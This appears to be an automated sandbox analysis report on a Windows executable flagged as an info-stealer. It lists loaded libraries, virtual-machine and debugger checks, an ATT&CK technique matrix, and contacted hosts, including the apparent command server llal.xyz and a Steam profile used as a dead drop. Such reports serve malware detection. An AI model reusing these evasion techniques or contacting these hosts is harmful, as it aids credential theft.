Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: OXoeX1Ii3x.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: OXoeX1Ii3x.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0017FC35 push ecx; ret 0_2_0017FC48
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeAPI coverage: 3.5 %
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_00147A82 __EH_prolog3_GS,FindFirstFileA,PathMatchSpecA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,FindClose,FindClose,0_2_00147A82
Source: Amcache.hve.3.drBinary or memory string: VMware
Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: OXoeX1Ii3x.exe, 00000000.00000002.1870239685.000000000301E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.000000000301E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.drBinary or memory string: vmci.sys
Source: Amcache.hve.3.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.drBinary or memory string: VMware20,1
Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0015D3D0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0015D3D0
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0015C2B7 mov eax, dword ptr fs:[00000030h]0_2_0015C2B7
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001587FB __EH_prolog3_GS,GetProcessHeap,HeapFree,Sleep,0_2_001587FB
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0015CA6E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0015CA6E
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0015D3D0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0015D3D0
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0015D535 SetUnhandledExceptionFilter,0_2_0015D535
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0016B6EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0016B6EC
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0015D1DF cpuid 0_2_0015D1DF
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: GetLocaleInfoW,0_2_001720A9
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: EnumSystemLocalesW,0_2_00178EA7
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: EnumSystemLocalesW,0_2_00178EA5
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: EnumSystemLocalesW,0_2_00178EF2
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: EnumSystemLocalesW,0_2_00178F8D
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00179020
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: GetLocaleInfoW,0_2_00179280
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_001793A9
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: GetLocaleInfoW,0_2_001794AF
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00179585
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: EnumSystemLocalesW,0_2_00171B7D
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_00164EC6 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_00164EC6
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_00172B10 GetTimeZoneInformation,0_2_00172B10
Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		1
Process Injection		1
Masquerading		OS Credential Dumping2
System Time Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Virtualization/Sandbox Evasion		LSASS Memory41
Security Software Discovery		Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection		Security Account Manager1
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS1
Process Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials22
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
OXoeX1Ii3x.exe53%VirustotalBrowse
OXoeX1Ii3x.exe68%ReversingLabsWin32.Spyware.Acrstealer
OXoeX1Ii3x.exe100%AviraTR/AVI.Ransom.faqrc
OXoeX1Ii3x.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842du0%Avira URL Cloudsafe
https://llal.xyz/0%Avira URL Cloudsafe
https://llal.xyz0%Avira URL Cloudsafe
https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d0%Avira URL Cloudsafe
https://llal.xyz/I0%Avira URL Cloudsafe
https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d$0%Avira URL Cloudsafe
https://https://t.me/asdfghjrrewqqqqtfg/ujs/WorldHellostrwvfncexGostrbrCHbrGkunknownftpac/Up/gltype0%Avira URL Cloudsafe
https://community.fa40%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
steamcommunity.com
104.102.49.254
truefalse
    		high
    llal.xyz
    		188.114.97.3
    		truetrue
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842dtrue
      • Avira URL Cloud: safe
      		unknown
      https://steamcommunity.com/profiles/76561199619938930false
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
          		high
          https://player.vimeo.comOXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://steamcommunity.com/profiles/76561199619938930/inventory/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
              		high
              https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampOXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                		high
                https://steamcommunity.com/?subsection=broadcastsOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                  		high
                  https://store.steampowered.com/subscriber_agreement/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                    		high
                    https://www.gstatic.cn/recaptcha/OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://www.valvesoftware.com/legal.htmOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                        		high
                        https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=enOXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                          		high
                          https://www.youtube.comOXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://steamcommunity.com/login/home/?goto=profiles%2F7656119961993893076561199619938930[1].htm.0.drfalse
                              		high
                              https://www.google.comOXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842duOXoeX1Ii3x.exe, 00000000.00000003.1693936827.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.1870379982.000000000302E000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                  		high
                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                    		high
                                    https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl76561199619938930[1].htm.0.drfalse
                                        		high
                                        https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisOXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                          		high
                                          https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003031000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                            		high
                                            https://s.ytimg.com;OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRiOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                		high
                                                https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                  		high
                                                  https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                    		high
                                                    https://community.fastly.steamstatic.com/OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://steam.tv/OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                          		high
